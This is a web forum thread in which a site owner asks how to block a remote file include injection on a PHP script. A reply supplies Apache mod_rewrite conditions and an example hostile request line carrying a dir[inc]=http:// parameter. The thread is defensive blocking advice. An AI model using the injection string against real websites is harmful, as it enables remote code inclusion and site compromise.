Forum Moderators: phranque
I am trying to trap a badguy from trying to do an include injection. I have tried it two different ways and both failed, the first one was:
RewriteCond %{REQUEST_URI} ^/inc/design.inc.php?dir[inc]=http://*
and the second one:
RewriteCond %{HTTP_REQUEST} ^/inc/design.inc.php?dir[inc]=http://*
I thought for sure the second one would trap the block of code but I just got another attempt in my log file that got through. Any ideas would be greatly appreciated.
I am trapping my IP range and that is working but the badguy is using lots of bogus addressses that I can not predict so I have to wait for the attack to get the current ones he is using an add it to the list.
I am thinking that trapping the call is a far more efficient way to manage it as this string is ALWAYS used in the attack.
Kindest regards, mikesz
The list of envars for use in RewriteConds is given in the mod_rewrite documentation [httpd.apache.org].
THE_REQUEST will include the entire browser request, such as
GET /inc/design.inc.php?dir%5binc%5d=http%3a%2f%2f/page.htm HTTP/1.1
Therefore your pattern must take the HTTP method at the beginning into account, and you'll also have to match the hex-encoded characters in the query string.
To avoid that, you could use two RewriteConds, one for the %{REQUEST_URI} part and another for the %{QUERY_STRING} :
RewriteCond %{QUERY_STRING} ^dir\[inc\]=http://\*
RewriteCond %{REQUEST_URI} ^/inc/design\.inc\.php$
Jim
both conditions produce the same result, separately or combined which is exactly what I need to trap the badguy before he evey gets to my script which has another trap just in case.
I had used the REQUEST_URI but was using the whole string including the QUERY_STRING (didn't know about that one... ) and it didn't work... BUT is DOES now!
Thanks very much I appreciate it and the very quick response too!
regards, mikesz
